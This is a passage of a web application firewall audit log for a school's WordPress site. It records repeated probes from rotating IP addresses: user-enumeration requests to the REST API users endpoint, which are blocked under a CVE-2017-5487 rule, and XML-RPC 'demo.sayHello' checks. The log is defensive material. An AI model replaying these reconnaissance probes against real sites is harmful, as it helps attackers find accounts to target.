(CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747494243985570 2805 (- - -) Stopwatch2: 1747494243985570 2805; combined=1260, p1=414, p2=817, p3=0, p4=0, p5=29, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c431ad63-Z-- --adc32f06-A-- [17/May/2025:22:04:11 +0700] aCila-m4kjNN-hEbWjKZkAAAAEU 103.236.140.4 56448 103.236.140.4 8181 --adc32f06-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.198.5 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.198.5 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --adc32f06-C-- demo.sayHello --adc32f06-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --adc32f06-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747494251726847 5312 (- - -) Stopwatch2: 1747494251726847 5312; combined=4284, p1=548, p2=3508, p3=33, p4=37, p5=94, sr=73, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --adc32f06-Z-- --c622573f-A-- [17/May/2025:22:04:22 +0700] aCildum4kjNN-hEbWjKZpQAAAEI 103.236.140.4 56672 103.236.140.4 8181 --c622573f-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.176.12 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.176.12 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --c622573f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c622573f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747494262216171 2426 (- - -) Stopwatch2: 1747494262216171 2426; combined=1058, p1=376, p2=658, p3=0, p4=0, p5=24, sr=61, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c622573f-Z-- --c522351e-A-- [17/May/2025:22:04:26 +0700] aCilenyxdQCiyU1ENFeWqQAAAAE 103.236.140.4 56760 103.236.140.4 8181 --c522351e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.176.12 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.176.12 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --c522351e-C-- demo.sayHello --c522351e-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --c522351e-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747494266635031 5034 (- - -) Stopwatch2: 1747494266635031 5034; combined=3674, p1=466, p2=3012, p3=32, p4=29, p5=80, sr=77, sw=55, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c522351e-Z-- --b84b8d52-A-- [17/May/2025:22:04:56 +0700] aCilmOm4kjNN-hEbWjKZvAAAAFQ 103.236.140.4 57422 103.236.140.4 8181 --b84b8d52-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.189.43 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.189.43 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --b84b8d52-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b84b8d52-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747494296837155 2750 (- - -) Stopwatch2: 1747494296837155 2750; combined=1285, p1=431, p2=825, p3=0, p4=0, p5=29, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b84b8d52-Z-- --2e401342-A-- [17/May/2025:22:05:03 +0700] aCilnwTOsBn9MSWb6WLInQAAAJA 103.236.140.4 57562 103.236.140.4 8181 --2e401342-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.189.43 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.189.43 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --2e401342-C-- demo.sayHello --2e401342-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --2e401342-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747494303791956 5078 (- - -) Stopwatch2: 1747494303791956 5078; combined=3819, p1=555, p2=3065, p3=30, p4=29, p5=82, sr=70, sw=58, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2e401342-Z-- --e95a247c-A-- [17/May/2025:22:05:21 +0700] aCilsXyxdQCiyU1ENFeXCwAAAA0 103.236.140.4 57894 103.236.140.4 8181 --e95a247c-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.36.40 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.36.40 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --e95a247c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e95a247c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747494321527512 2667 (- - -) Stopwatch2: 1747494321527512 2667; combined=1312, p1=412, p2=866, p3=0, p4=0, p5=33, sr=73, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e95a247c-Z-- --45d47b5d-A-- [17/May/2025:22:05:25 +0700] aCiltem4kjNN-hEbWjKZzQAAAFg 103.236.140.4 57978 103.236.140.4 8181 --45d47b5d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.36.40 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.36.40 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --45d47b5d-C-- demo.sayHello --45d47b5d-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --45d47b5d-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747494325652029 6084 (- - -) Stopwatch2: 1747494325652029 6084; combined=4939, p1=630, p2=4064, p3=40, p4=45, p5=96, sr=73, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --45d47b5d-Z-- --afbe970c-A-- [17/May/2025:22:08:01 +0700] aCimUXyxdQCiyU1ENFeXsAAAABM 103.236.140.4 60876 103.236.140.4 8181 --afbe970c-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.184.170 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.184.170 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --afbe970c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --afbe970c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747494481968795 3108 (- - -) Stopwatch2: 1747494481968795 3108; combined=1354, p1=443, p2=876, p3=0, p4=0, p5=35, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --afbe970c-Z-- --a3f9d54f-A-- [17/May/2025:22:08:08 +0700] aCimWBKi5m5upc8uMd4L8AAAANg 103.236.140.4 32788 103.236.140.4 8181 --a3f9d54f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.184.170 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.184.170 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --a3f9d54f-C-- demo.sayHello --a3f9d54f-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --a3f9d54f-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747494488766588 5682 (- - -) Stopwatch2: 1747494488766588 5682; combined=4184, p1=534, p2=3420, p3=33, p4=34, p5=96, sr=76, sw=67, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a3f9d54f-Z-- --e430796f-A-- [17/May/2025:22:08:08 +0700] aCimWBKi5m5upc8uMd4L8gAAAMY 103.236.140.4 32794 103.236.140.4 8181 --e430796f-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.95.55 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.95.55 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --e430796f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e430796f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747494488800074 2346 (- - -) Stopwatch2: 1747494488800074 2346; combined=1145, p1=427, p2=681, p3=0, p4=0, p5=37, sr=143, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e430796f-Z-- --a463c654-A-- [17/May/2025:22:08:14 +0700] aCimXgTOsBn9MSWb6WLJPAAAAJc 103.236.140.4 32896 103.236.140.4 8181 --a463c654-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.95.55 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.95.55 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --a463c654-C-- demo.sayHello --a463c654-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --a463c654-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747494494295913 7728 (- - -) Stopwatch2: 1747494494295913 7728; combined=5956, p1=774, p2=4892, p3=50, p4=70, p5=102, sr=119, sw=68, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a463c654-Z-- --847ab47f-A-- [17/May/2025:22:10:01 +0700] aCimyem4kjNN-hEbWjKa2QAAAEg 103.236.140.4 34140 103.236.140.4 8181 --847ab47f-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.99.218 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.99.218 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --847ab47f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --847ab47f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747494601148669 2886 (- - -) Stopwatch2: 1747494601148669 2886; combined=1281, p1=414, p2=835, p3=0, p4=0, p5=32, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --847ab47f-Z-- --1cfe570e-A-- [17/May/2025:22:10:06 +0700] aCimzum4kjNN-hEbWjKa3wAAAEQ 103.236.140.4 34238 103.236.140.4 8181 --1cfe570e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.99.218 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.99.218 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --1cfe570e-C-- demo.sayHello --1cfe570e-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --1cfe570e-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747494606758686 5417 (- - -) Stopwatch2: 1747494606758686 5417; combined=3935, p1=535, p2=3194, p3=32, p4=34, p5=83, sr=64, sw=57, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1cfe570e-Z-- --43048e1a-A-- [17/May/2025:22:10:57 +0700] aCinAXyxdQCiyU1ENFeYgAAAAAg 103.236.140.4 35166 103.236.140.4 8181 --43048e1a-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.178.173 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.178.173 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --43048e1a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --43048e1a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747494657260536 2783 (- - -) Stopwatch2: 1747494657260536 2783; combined=1267, p1=407, p2=832, p3=0, p4=0, p5=28, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --43048e1a-Z-- --fe413e0c-A-- [17/May/2025:22:11:04 +0700] aCinCOm4kjNN-hEbWjKbLQAAAEY 103.236.140.4 35318 103.236.140.4 8181 --fe413e0c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.178.173 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.178.173 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --fe413e0c-C-- demo.sayHello --fe413e0c-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --fe413e0c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747494664527986 4550 (- - -) Stopwatch2: 1747494664527986 4550; combined=3304, p1=436, p2=2585, p3=28, p4=29, p5=124, sr=53, sw=102, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fe413e0c-Z-- --ded1c727-A-- [17/May/2025:22:11:22 +0700] aCinGnyxdQCiyU1ENFeYnwAAABM 103.236.140.4 35652 103.236.140.4 8181 --ded1c727-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.248.87.186 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.87.186 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --ded1c727-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ded1c727-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747494682464386 2999 (- - -) Stopwatch2: 1747494682464386 2999; combined=1282, p1=424, p2=824, p3=0, p4=0, p5=34, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ded1c727-Z-- --e28b077b-A-- [17/May/2025:22:11:29 +0700] aCinIQTOsBn9MSWb6WLJ5QAAAI0 103.236.140.4 35792 103.236.140.4 8181 --e28b077b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.248.87.186 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.87.186 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --e28b077b-C-- demo.sayHello --e28b077b-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --e28b077b-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against 